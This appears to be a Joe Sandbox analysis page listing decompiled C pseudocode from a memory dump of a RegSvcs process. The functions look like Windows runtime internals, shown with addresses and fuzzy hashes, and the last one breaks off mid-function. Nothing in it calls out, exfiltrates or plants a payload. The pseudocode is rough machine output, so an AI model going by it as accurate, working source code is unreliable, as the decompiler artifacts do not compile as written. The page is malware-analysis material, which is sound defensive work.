                                          0x013bea80
                                          0x013bea85
                                          0x013bea8b
                                          0x013beab5
                                          0x013beabc
                                          0x013beabf
                                          0x013beabf
                                          0x013beaca
                                          0x013beace
                                          0x013bead0
                                          0x013beae4
                                          0x013beaeb
                                          0x013beaf0
                                          0x013beaf5
                                          0x013beb09
                                          0x013beb0d
                                          0x013beb1d
                                          0x013beb2d
                                          0x013beb38
                                          0x013beb3d
                                          0x013beb41
                                          0x013beb4a
                                          0x013beb60
                                          0x013beb4c
                                          0x013beb52
                                          0x013beb59
                                          0x013beb59
                                          0x013beb68
                                          0x013beb71
                                          0x013beb71
                                          0x013bea8d
                                          0x013bea8f
                                          0x013bea92
                                          0x013bea97
                                          0x013bea97
                                          0x013bea9b
                                          0x013bea9c
                                          0x013bea9e
                                          0x013beaa6
                                          0x013beaa6
                                          0x013beb7e

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                          • Instruction ID: 217b309cd2d0d432ae7e306c9cf35a110db50853221f3a663996a009c6a9e2e7
                                          • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                          • Instruction Fuzzy Hash: 1931A5726047069BD719DF2CC8C0A9BB7A9FBC4654F04492DE65687B45EE30E805C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013769A6 Relevance: .1, Instructions: 108COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E013769A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x13ed360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01306C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01376BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01339980() >= 0) {
							E01312280(_t56, 0x13e8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x13e8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x13e8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E012FB6F0(0x12dc338, 0x12dc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01339520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E013395D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0130FFB0(_t68, _t77, 0x13e8778);
				}
				_pop(_t78);
				return E0133B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                          0x013769b5
                                          0x013769be
                                          0x013769c3
                                          0x013769c9
                                          0x013769cc
                                          0x013769d1
                                          0x013769d3
                                          0x013769de
                                          0x013769e1
                                          0x013769ea
                                          0x013769f6
                                          0x013769fe
                                          0x01376a13
                                          0x01376a14
                                          0x01376a15
                                          0x01376a16
                                          0x01376a1e
                                          0x01376a26
                                          0x01376a31
                                          0x01376a36
                                          0x01376a37
                                          0x01376a40
                                          0x01376a49
                                          0x01376a4a
                                          0x01376a53
                                          0x01376a59
                                          0x01376a5d
                                          0x01376a5e
                                          0x01376a64
                                          0x01376a67
                                          0x01376a6a
                                          0x01376a6d
                                          0x01376a70
                                          0x01376a77
                                          0x01376a7d
                                          0x01376a86
                                          0x01376a89
                                          0x01376a9c
                                          0x01376a9f
                                          0x01376aa2
                                          0x01376aa5
                                          0x01376aaf
                                          0x01376ab1
                                          0x01376ab8
                                          0x01376ab9
                                          0x01376abb
                                          0x01376abe
                                          0x01376ac5
                                          0x01376ac5
                                          0x01376aaf
                                          0x01376a40
                                          0x01376a26
                                          0x013769fe
                                          0x01376ace
                                          0x01376ad0
                                          0x01376ad3
                                          0x01376ad8
                                          0x01376adf
                                          0x01376adf
                                          0x01376ae8
                                          0x01376aef
                                          0x01376aef
                                          0x01376af9
                                          0x01376b06

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a2b6be2ce2ebc3c4d4a2ecb0db8bdd587b3a2464ba43474d02c4a8bfed689764
                                          • Instruction ID: 03a6e1f06409d24730046dfa9201e2f5ddfad0ecd7704d74f50814c62555c6d5
                                          • Opcode Fuzzy Hash: a2b6be2ce2ebc3c4d4a2ecb0db8bdd587b3a2464ba43474d02c4a8bfed689764
                                          • Instruction Fuzzy Hash: 15418FB1D007099FEB24DFA9C941BFEBBF8EF48718F14852AE914A7240DB749905CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012F5210 Relevance: .1, Instructions: 107COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E012F5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E012F52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E013395D0();
							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0130EB70(_t54, 0x13e79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E013395D0();
								L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0130EB70(_t54, 0x13e79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0133F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0130EB70(_t54, 0x13e79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E013395D0();
							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                          0x012f5220
                                          0x012f5224
                                          0x01350d13
                                          0x01350d16
                                          0x01350d19
                                          0x012f522a
                                          0x012f522a
                                          0x012f522d
                                          0x012f522d
                                          0x012f5231
                                          0x012f5235
                                          0x012f5239
                                          0x01350d5c
                                          0x01350d62
                                          0x00000000
                                          0x00000000
                                          0x01350d6a
                                          0x01350d7b
                                          0x01350d7f
                                          0x01350d81
                                          0x01350d84
                                          0x01350d95
                                          0x01350d95
                                          0x01350d6c
                                          0x01350d71
                                          0x01350d71
                                          0x01350d9a
                                          0x00000000
                                          0x012f524a
                                          0x012f524a
                                          0x012f5250
                                          0x01350d24
                                          0x01350d35
                                          0x01350d39
                                          0x01350d3b
                                          0x01350d3e
                                          0x01350d50
                                          0x01350d50
                                          0x01350d26
                                          0x01350d2b
                                          0x01350d2b
                                          0x00000000
                                          0x01350d55
                                          0x012f5256
                                          0x012f525b
                                          0x012f5265
                                          0x01350da7
                                          0x012f526b
                                          0x012f526e
                                          0x012f5272
                                          0x01350db1
                                          0x01350db4
                                          0x01350dc5
                                          0x01350dc5
                                          0x012f5272
                                          0x012f5278
                                          0x012f527e
                                          0x012f528a
                                          0x012f528c
                                          0x012f528d
                                          0x00000000
                                          0x012f5280
                                          0x012f5282
                                          0x012f5288
                                          0x012f529f
                                          0x012f5292
                                          0x00000000
                                          0x012f5292
                                          0x00000000
                                          0x012f5288
                                          0x012f527e

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f5fa645ee7b34e5ec952d805b2b17105e5207ca1b76c77965ee6fb11fd93fc1
                                          • Instruction ID: e385d0702bfeb581cab22868cb855e52035d32284526b8481020b92ac4081957
                                          • Opcode Fuzzy Hash: 2f5fa645ee7b34e5ec952d805b2b17105e5207ca1b76c77965ee6fb11fd93fc1
                                          • Instruction Fuzzy Hash: 22311631261611DBC76AAB1CC851F6AB7E5FF50B68F114B29F9550B6E0DB61E800C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01333D43 Relevance: .1, Instructions: 106COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01333D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E01307B60(0, _t61, 0x12d11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E01307B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01314620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                          0x01333d4c
                                          0x01333d50
                                          0x01333d55
                                          0x01333d5e
                                          0x0136e79a
                                          0x00000000
                                          0x0136e79a
                                          0x01333d68
                                          0x0136e789
                                          0x01333d9d
                                          0x01333da3
                                          0x01333daf
                                          0x01333db5
                                          0x01333dbc
                                          0x01333dc4
                                          0x01333dc9
                                          0x01333dce
                                          0x0136e7ae
                                          0x0136e7ae
                                          0x01333dde
                                          0x01333de2
                                          0x01333de7
                                          0x01333e0d
                                          0x01333e13
                                          0x01333e16
                                          0x01333e1e
                                          0x01333e25
                                          0x01333e28
                                          0x00000000
                                          0x00000000
                                          0x01333e2a
                                          0x01333e2f
                                          0x01333e37
                                          0x01333e37
                                          0x00000000
                                          0x01333e37
                                          0x01333e31
                                          0x00000000
                                          0x01333e31
                                          0x01333e20
                                          0x01333e20
                                          0x01333e35
                                          0x00000000
                                          0x01333de9
                                          0x01333de9
                                          0x01333de9
                                          0x01333dee
                                          0x01333dfd
                                          0x01333dff
                                          0x01333e02
                                          0x01333e05
                                          0x01333e05
                                          0x00000000
                                          0x01333df0
                                          0x01333de7
                                          0x0136e78f
                                          0x0136e794
                                          0x01333d79
                                          0x01333d84
                                          0x01333d89
                                          0x01333d8e
                                          0x00000000
                                          0x0136e7a4
                                          0x01333d96
                                          0x01333d9a
                                          0x00000000
                                          0x01333d9a
                                          0x00000000
                                          0x0136e794
                                          0x01333d6e
                                          0x01333d73
                                          0x00000000
                                          0x0136e7b5
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c090a36f2cdc354308cb98133f4825358ee295ce05ed9d748df02ce4ba30710
                                          • Instruction ID: 38e20e580f08be401d0dd481701ae9621061f6f02c264d4581337239ea4f3095
                                          • Opcode Fuzzy Hash: 1c090a36f2cdc354308cb98133f4825358ee295ce05ed9d748df02ce4ba30710
                                          • Instruction Fuzzy Hash: 4C31ED32A00615DBC725CF2DC845A2ABBE9FF84718B05C06AE84ACB750E734D840C7A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132A61C Relevance: .1, Instructions: 106COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E0132A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x13d0220);
				E0134D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x13e7b9c; // 0x0
				_t55 = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0134D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x13e7b10 =  *0x13e7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x13e536c; // 0x77e45368
					if( *_t51 != 0x13e5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x13e5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x13e536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0132A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                          0x0132a61c
                                          0x0132a61e
                                          0x0132a623
                                          0x0132a628
                                          0x0132a62b
                                          0x0132a62d
                                          0x0132a648
                                          0x0132a64a
                                          0x0132a64f
                                          0x01369b44
                                          0x0132a6ec
                                          0x0132a6f1
                                          0x0132a6f1
                                          0x0132a655
                                          0x0132a657
                                          0x0132a65a
                                          0x0132a65d
                                          0x0132a662
                                          0x0132a663
                                          0x0132a667
                                          0x0132a668
                                          0x0132a66d
                                          0x0132a706
                                          0x0132a706
                                          0x01369bda
                                          0x01369be6
                                          0x01369beb
                                          0x00000000
                                          0x01369beb
                                          0x0132a679
                                          0x01369b7a
                                          0x00000000
                                          0x01369b7a
                                          0x0132a683
                                          0x0132a6f4
                                          0x0132a6f7
                                          0x0132a6f9
                                          0x0132a6fd
                                          0x0132a6a0
                                          0x0132a6a0
                                          0x0132a6ad
                                          0x0132a6af
                                          0x0132a6b4
                                          0x01369ba7
                                          0x01369bac
                                          0x00000000
                                          0x00000000
                                          0x01369bc6
                                          0x01369bce
                                          0x01369bd1
                                          0x01369bd3
                                          0x01369bd3
                                          0x00000000
                                          0x01369bd1
                                          0x0132a6bd
                                          0x0132a6c3
                                          0x0132a6c6
                                          0x0132a6d2
                                          0x0132a701
                                          0x0132a704
                                          0x00000000
                                          0x0132a704
                                          0x0132a6d4
                                          0x0132a6d6
                                          0x0132a6d9
                                          0x0132a6db
                                          0x0132a6e1
                                          0x0132a6e6
                                          0x0132a6e8
                                          0x0132a6e8
                                          0x0132a6ea
                                          0x00000000
                                          0x0132a6ea
                                          0x0132a688
                                          0x0132a692
                                          0x0132a694
                                          0x0132a699
                                          0x00000000
                                          0x00000000
                                          0x0132a69d
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f3b409b07071e0c277e4e5ec643979f9be928dcb529cdf6acaa98a07ac183001
                                          • Instruction ID: 7011a826c8edefaed352f1e58641561aac5a2fe549c5344179c453a5a79ed60f
                                          • Opcode Fuzzy Hash: f3b409b07071e0c277e4e5ec643979f9be928dcb529cdf6acaa98a07ac183001
                                          • Instruction Fuzzy Hash: 2A417B75A00219DFCB25DF58C880B99BBF5BB49318F14C069E905AF788C774A901CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0131C182 Relevance: .1, Instructions: 104COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E0131C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01317D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E013C8D34(_v8, _t80);
					}
					E01312280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0130FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E013C8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0130FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0133B180();
						if(_a4 != 0) {
							E01312280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0131BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0131BB2D(_t16, _t15);
						E0131B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0130FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0130FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0130FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                          0x0131c18d
                                          0x0131c18f
                                          0x0131c191
                                          0x0131c19b
                                          0x0131c1a0
                                          0x0131c1d4
                                          0x0131c1de
                                          0x01362d6e
                                          0x0131c1e4
                                          0x0131c1e4
                                          0x0131c1e4
                                          0x0131c1ec
                                          0x01362d7d
                                          0x01362d7d
                                          0x0131c1f3
                                          0x0131c1ff
                                          0x01362d88
                                          0x01362d8d
                                          0x01362d94
                                          0x01362d94
                                          0x01362d9f
                                          0x01362da4
                                          0x01362dab
                                          0x01362db0
                                          0x01362db2
                                          0x01362db3
                                          0x01362db4
                                          0x01362dbc
                                          0x01362dc3
                                          0x01362dc3
                                          0x0131c205
                                          0x0131c205
                                          0x0131c208
                                          0x0131c20e
                                          0x0131c211
                                          0x0131c216
                                          0x0131c219
                                          0x0131c21f
                                          0x0131c222
                                          0x0131c22c
                                          0x0131c234
                                          0x0131c23a
                                          0x0131c23f
                                          0x0131c245
                                          0x0131c24b
                                          0x0131c251
                                          0x0131c25a
                                          0x0131c276
                                          0x0131c27d
                                          0x0131c27d
                                          0x0131c25c
                                          0x0131c25c
                                          0x00000000
                                          0x0131c25e
                                          0x0131c1a4
                                          0x0131c1aa
                                          0x0131c1b3
                                          0x0131c265
                                          0x0131c26c
                                          0x0131c26c
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                          • Instruction ID: 8dd20e2c4d01e7ac8b845746adcd1fd24db86a0fbe7085fbf9c7e9ac108b53a1
                                          • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                          • Instruction Fuzzy Hash: 8E314D7164154BBFD719EBB8C490BEAF7A8BF5210CF04815AC41C47249DB386A1AC7D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01377016 Relevance: .1, Instructions: 104COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E01377016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x13ed360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
